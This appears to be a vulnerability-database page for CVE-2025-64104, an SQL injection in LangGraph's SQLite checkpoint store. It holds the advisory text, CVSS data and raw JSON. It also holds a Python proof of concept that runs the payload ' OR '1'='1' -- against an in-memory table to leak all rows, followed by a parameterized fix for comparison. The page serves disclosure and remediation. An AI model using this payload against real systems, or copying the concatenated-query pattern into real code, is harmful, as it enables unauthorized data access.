Security Vulnerability Report
CVE-2025-64104 CVSS 7.3 HIGH

CVE-2025-64104

Published: 2025-10-29 19:15:39
Last Modified: 2026-04-15 00:35:42

Description

LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite). Prior to 2.0.11, LangGraph's SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls. This vulnerability is fixed in 2.0.11.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

NVD provides no CPE configuration data for this CVE. From the description: the SQLite store implementation in LangGraph SQLite Checkpoint (the langgraph-checkpoint-sqlite package, both the sync and the aiosqlite-based async variants) is affected in all versions prior to 2.0.11; version 2.0.11 contains the fix. LangGraph core itself is not the affected component.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-64104 PoC - LangGraph SQLite Checkpoint SQL Injection
Note: This is a simplified demonstration for educational purposes only.
"""
import sqlite3


# Vulnerable code pattern (before fix)
def vulnerable_query_builder(thread_id, checkpoint_id):
    """
    Simulates the vulnerable SQL query construction in LangGraph SQLite
    Checkpoint < 2.0.11: direct string concatenation without parameterization.
    """
    # This is the vulnerable pattern - direct string interpolation
    query = (
        f"SELECT * FROM checkpoints WHERE thread_id = '{thread_id}' "
        f"AND checkpoint_id = '{checkpoint_id}'"
    )
    return query


# Example of SQL injection payload
def generate_sql_injection_payload():
    """
    Generate a SQL injection payload that collapses the WHERE clause so the
    query returns every row, bypassing the per-thread access restriction.
    """
    # Payload to inject: ' OR '1'='1' --
    # The leading quote closes the literal, OR '1'='1' is always true, and the
    # SQLite line comment (--) discards the rest of the original WHERE clause.
    malicious_thread_id = "' OR '1'='1' --"
    malicious_checkpoint_id = "anything"
    return malicious_thread_id, malicious_checkpoint_id


# Demonstrate the vulnerability
def demonstrate_vulnerability():
    # Create a test database
    conn = sqlite3.connect(":memory:")
    cursor = conn.cursor()

    # Create test table with sensitive data
    cursor.execute(
        """
        CREATE TABLE checkpoints (
            thread_id TEXT,
            checkpoint_id TEXT,
            data TEXT,
            access_level TEXT
        )
        """
    )

    # Insert test data
    cursor.execute(
        "INSERT INTO checkpoints VALUES ('user1', 'ckpt1', 'secret_data_1', 'user')"
    )
    cursor.execute(
        "INSERT INTO checkpoints VALUES ('user2', 'ckpt2', 'secret_data_2', 'admin')"
    )
    conn.commit()

    # Normal query (intended behavior)
    print("=== Normal Query ===")
    normal_query = vulnerable_query_builder("user1", "ckpt1")
    print(f"Query: {normal_query}")
    cursor.execute(normal_query)
    print(f"Result: {cursor.fetchall()}")

    # Malicious query (SQL injection)
    print("\n=== SQL Injection Attack ===")
    malicious_thread_id, malicious_checkpoint_id = generate_sql_injection_payload()
    malicious_query = vulnerable_query_builder(malicious_thread_id, malicious_checkpoint_id)
    print(f"Malicious Query: {malicious_query}")
    cursor.execute(malicious_query)
    print(f"Result (ALL data leaked): {cursor.fetchall()}")

    conn.close()


# Async example for LangGraph async usage
async def vulnerable_async_query(db_path, thread_id, checkpoint_id):
    """
    Vulnerable async query pattern used in the aiosqlite-based implementation.
    aiosqlite is imported here so the sync demo above runs without it installed.
    """
    import aiosqlite

    async with aiosqlite.connect(db_path) as db:
        # Vulnerable: direct string formatting
        query = f"SELECT * FROM checkpoints WHERE thread_id = '{thread_id}'"
        async with db.execute(query) as cursor:
            return await cursor.fetchall()


if __name__ == "__main__":
    demonstrate_vulnerability()
    print("\n[!] This PoC demonstrates the SQL injection vulnerability.")
    print("[!] Upgrade LangGraph SQLite Checkpoint (langgraph-checkpoint-sqlite) to >= 2.0.11 to fix this issue.")
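The PoC above only shows the broken pattern. As an added example (not code from this page or from the LangGraph project), the following puts the string-built lookup the advisory describes next to the hardened form a fix of this class applies: values are passed to SQLite as bound parameters, and the one thing parameters cannot express, the column name in a dynamic filter, is checked against a fixed allowlist. Both are run against a constructed in-memory table with the same injection payload. The table, column and helper names and the sample rows are assumptions chosen for illustration and do not mirror the real langgraph-checkpoint-sqlite schema.

```python
"""
Added example (not LangGraph's own code): the vulnerable string-built lookup
next to a parameterized, allowlisted rewrite, exercised with the same payload.
Schema, names and rows are assumptions for illustration only.
"""
import sqlite3

# Constructed sample data (not real checkpoint content).
SAMPLE_ROWS = [
    ("thread-alice", "ckpt-1", "alice private state"),
    ("thread-bob", "ckpt-2", "bob private state"),
]

# Columns a caller may filter on. Identifiers cannot be bound as SQL
# parameters, so a dynamic column name must be validated against a fixed set.
FILTERABLE_COLUMNS = frozenset({"thread_id", "checkpoint_id"})

SELECT_PREFIX = "SELECT thread_id, checkpoint_id, data FROM checkpoints WHERE "


def make_db() -> sqlite3.Connection:
    """Create an in-memory table holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE checkpoints (thread_id TEXT, checkpoint_id TEXT, data TEXT)"
    )
    conn.executemany("INSERT INTO checkpoints VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, filters: dict) -> list:
    """The CWE-89 pattern behind CVE-2025-64104: values spliced into SQL text."""
    if not filters:
        raise ValueError("at least one filter is required")
    clauses = [f"{col} = '{val}'" for col, val in filters.items()]
    return conn.execute(SELECT_PREFIX + " AND ".join(clauses)).fetchall()


def safe_lookup(conn: sqlite3.Connection, filters: dict) -> list:
    """Hardened form: allowlisted identifiers, bound parameters for values."""
    if not filters:
        raise ValueError("at least one filter is required")
    clauses, params = [], []
    for col, val in filters.items():
        if col not in FILTERABLE_COLUMNS:
            # Reject rather than quote: an unknown identifier is never valid input.
            raise ValueError(f"filter on unsupported column: {col!r}")
        clauses.append(f"{col} = ?")  # col is a known-good literal from the allowlist
        params.append(val)           # val travels as a parameter, never as SQL text
    return conn.execute(SELECT_PREFIX + " AND ".join(clauses), params).fetchall()


def demo() -> dict:
    """Run both lookups with a legitimate filter and with the PoC payload."""
    conn = make_db()
    legit = {"thread_id": "thread-alice"}
    injected = {"thread_id": "' OR '1'='1' --"}
    results = {
        "vuln_legit": vulnerable_lookup(conn, legit),
        "vuln_injected": vulnerable_lookup(conn, injected),  # leaks every thread
        "safe_legit": safe_lookup(conn, legit),
        "safe_injected": safe_lookup(conn, injected),        # payload is just a string
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With the payload bound as a parameter, SQLite compares it byte-for-byte against thread_id and matches nothing; the same payload concatenated into the query text returns both threads' rows. The identifier allowlist matters because a store that accepts caller-supplied filter keys or namespaces would otherwise be tempted to interpolate those too, and no driver can parameterize a column name.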

References

https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8 (GitHub security advisory)
https://github.com/langchain-ai/langgraph/commit/bc9d45b476101e441cb1cc602dea03eb29232de4 (fix commit)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64104", "sourceIdentifier": "[email protected]", "published": "2025-10-29T19:15:39.220", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite). Prior to 2.0.11, LangGraph's SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls. This vulnerability is fixed in 2.0.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.0, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/langchain-ai/langgraph/commit/bc9d45b476101e441cb1cc602dea03eb29232de4", "source": "[email protected]"}, {"url": "https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8", "source": "[email protected]"}, {"url": "https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}